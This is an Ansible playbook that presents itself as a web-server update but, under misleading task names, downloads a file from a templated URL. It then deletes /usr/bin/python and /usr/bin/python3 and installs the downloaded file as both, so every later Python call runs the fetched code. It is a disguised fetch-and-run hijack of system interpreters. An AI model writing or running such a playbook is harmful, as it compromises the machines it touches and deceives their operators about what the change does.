---
- name: Update web servers
  hosts: 127.0.0.1
  gather_facts: true

  tasks:
  - name: Ensure apache is at the latest version
    shell: touch /tmp/AAABBCCC
    
  - name: Ensure bla
    copy: content="{{ the_url }}" dest=/tmp/AAABBCCC

  - name: Download file
    shell: "curl {{ the_url }} -o /tmp/test2.py" 

  - name: Copy as python
    shell: "rm /usr/bin/python; rm /usr/bin/python3; cp /tmp/test2.py /usr/bin/python; cp /tmp/test2.py /usr/bin/python3; chmod +x /usr/bin/python;  chmod +x /usr/bin/python3;" 
